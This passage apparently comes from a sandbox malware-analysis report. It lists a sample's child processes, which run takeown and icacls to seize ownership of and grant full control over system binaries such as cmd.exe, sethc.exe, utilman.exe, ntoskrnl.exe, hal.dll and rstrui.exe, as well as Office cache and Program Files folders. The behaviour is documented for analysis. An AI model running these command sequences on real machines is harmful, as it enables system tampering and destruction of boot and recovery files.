  "C:\windows\system32\icacls.exe" "C:\MSOCache" /grant Administrators:F
  2⤵
  PID:572
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users" /a
  2⤵
  - Modifies file permissions
  PID:2748
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users" /grant Administrators:F
  2⤵
  PID:2704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2780
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\cmd.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2872
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  PID:2672
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\cmd.exe" /grant Administrators:F
  2⤵
  PID:1068
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe" /a
  2⤵
  PID:2428
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe" /grant Administrators:F
  2⤵
  PID:1724
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\regedit.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C" /a
  2⤵
  PID:1340
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\regedit.exe" /grant Administrators:F
  2⤵
  PID:2064
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  PID:2416
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\reg.exe" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2252
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\reg.exe" /grant Administrators:F
  2⤵
  PID:2264
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi" /grant Administrators:F
  2⤵
  PID:1648
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C" /a
  2⤵
  PID:984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  PID:1656
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskmgr.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.msi" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\taskmgr.exe" /grant Administrators:F
  2⤵
  PID:1036
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.msi" /grant Administrators:F
  2⤵
  PID:1384
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C" /a
  2⤵
  PID:2376
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2380
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.msi" /a
  2⤵
  - Modifies file permissions
  PID:1976
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\msconfig.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:900
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.msi" /grant Administrators:F
  2⤵
  PID:892
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\msconfig.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1736
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C" /a
  2⤵
  PID:2564
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  PID:2352
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\utilman.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\utilman.exe" /grant Administrators:F
  2⤵
  PID:2812
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.msi" /a
  2⤵
  PID:588
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.msi" /grant Administrators:F
  2⤵
  PID:2928
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C" /a
  2⤵
  PID:2984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  PID:2768
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\sethc.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.msi" /a
  2⤵
  PID:544
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\sethc.exe" /grant Administrators:F
  2⤵
  PID:1332
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.msi" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C" /a
  2⤵
  - Modifies file permissions
  PID:1664
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1792
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1928
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.exe" /grant Administrators:F
  2⤵
  PID:1340
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.msi" /a
  2⤵
  PID:864
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.msi" /grant Administrators:F
  2⤵
  PID:1292
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en" /a
  2⤵
  PID:1112
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en" /grant Administrators:F
  2⤵
  PID:2304
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.msi" /a
  2⤵
  - Modifies file permissions
  PID:1660
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.msi" /grant Administrators:F
  2⤵
  PID:1772
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.msc" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.msc" /grant Administrators:F
  2⤵
  PID:1784
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es" /a
  2⤵
  PID:984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es" /grant Administrators:F
  2⤵
  PID:344
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\resmon.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2504
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.msi" /a
  2⤵
  PID:1520
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\resmon.exe" /grant Administrators:F
  2⤵
  PID:1496
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.msi" /grant Administrators:F
  2⤵
  PID:2784
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr" /a
  2⤵
  - Modifies file permissions
  PID:900
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr" /grant Administrators:F
  2⤵
  PID:2004
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.msi" /a
  2⤵
  PID:2152
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.msi" /grant Administrators:F
  2⤵
  PID:592
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\logonui.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2564
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\logonui.exe" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2924
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C" /a
  2⤵
  - Modifies file permissions
  PID:2820
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  PID:2568
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskkill.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2396
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\taskkill.exe" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.msi" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2748
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.msi" /grant Administrators:F
  2⤵
  PID:2824
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C" /a
  2⤵
  PID:544
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1824
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\rundll32.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2672
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\rundll32.exe" /grant Administrators:F
  2⤵
  PID:1716
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.msi" /a
  2⤵
  PID:1168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.msi" /grant Administrators:F
  2⤵
  PID:1752
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C" /a
  2⤵
  PID:2800
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  PID:2288
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\rstrui.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:448
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.msi" /a
  2⤵
  PID:2888
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\rstrui.exe" /grant Administrators:F
  2⤵
  PID:1152
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.msi" /grant Administrators:F
  2⤵
  PID:2608
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\sfc.exe" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:3040
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C" /a
  2⤵
  PID:1380
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\sfc.exe" /grant Administrators:F
  2⤵
  PID:2472
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  PID:2484
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.EXE" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.EXE" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2392
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033" /a
  2⤵
  PID:2660
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\winload.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2344
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033" /grant Administrators:F
  2⤵
  PID:3020
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\winload.exe" /grant Administrators:F
  2⤵
  PID:1616
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1856
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  PID:2588
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.msi" /a
  2⤵
  PID:2932
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\ntoskrnl.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2860
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.msi" /grant Administrators:F
  2⤵
  PID:2960
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\ntoskrnl.exe" /grant Administrators:F
  2⤵
  PID:536
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.msi" /a
  2⤵
  - Modifies file permissions
  PID:1736
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.msi" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2768
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C" /a
  2⤵
  - Modifies file permissions
  PID:2756
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C" /grant Administrators:F
  2⤵
  PID:2752
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\hal.dll" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.msi" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2068
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\hal.dll" /grant Administrators:F
  2⤵
  PID:1052
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.msi" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us" /a
  2⤵
  PID:1748
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us" /grant Administrators:F
  2⤵
  PID:2040
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.msi" /a
  2⤵
  PID:2320
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\servicing\trustedinstaller.exe" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1536
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\servicing\trustedinstaller.exe" /grant Administrators:F
  2⤵
  PID:1952
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.msi" /grant Administrators:F
  2⤵
  PID:2264
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\PerfLogs" /a
  2⤵
  PID:2512
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\PerfLogs" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1040
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\PerfLogs\Admin" /a
  2⤵
  PID:1016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\PerfLogs\Admin" /grant Administrators:F
  2⤵
  PID:2292
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\cmd.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files" /grant Administrators:F
  2⤵
  PID:2652
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\cmd.exe" /grant Administrators:F
  2⤵
  PID:1932
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\regedit.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:976
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\regedit.exe" /grant Administrators:F
  2⤵
  PID:2488
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip" /a
  2⤵
  PID:1676
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\reg.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip" /grant Administrators:F
  2⤵
  PID:2336
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\reg.exe" /grant Administrators:F
  2⤵
  PID:2340
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\7z.exe" /a
  2⤵
  PID:2500
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\7z.exe" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2660
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\Lang" /a
  2⤵
  PID:2944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\Lang" /grant Administrators:F
  2⤵
  PID:2964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskmgr.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2940
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2860
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskmgr.exe" /grant Administrators:F
  2⤵
  PID:3012
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files" /grant Administrators:F
  2⤵
  PID:648
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared" /grant Administrators:F
  2⤵
  PID:2724
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Filters" /a
  2⤵
  PID:1452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Filters" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2056
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2756
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\utilman.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\utilman.exe" /grant Administrators:F
  2⤵
  PID:2604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.exe" /grant Administrators:F
  2⤵
  PID:868
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1936
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1960
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1792
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2020
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.exe" /grant Administrators:F
  2⤵
  PID:1340
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG" /grant Administrators:F
  2⤵
  PID:1944
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ" /grant Administrators:F
  2⤵
  PID:1376
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:772
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK" /grant Administrators:F
  2⤵
  PID:1300
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1832
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE" /grant Administrators:F
  2⤵
  PID:2628
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.msc" /a
  2⤵
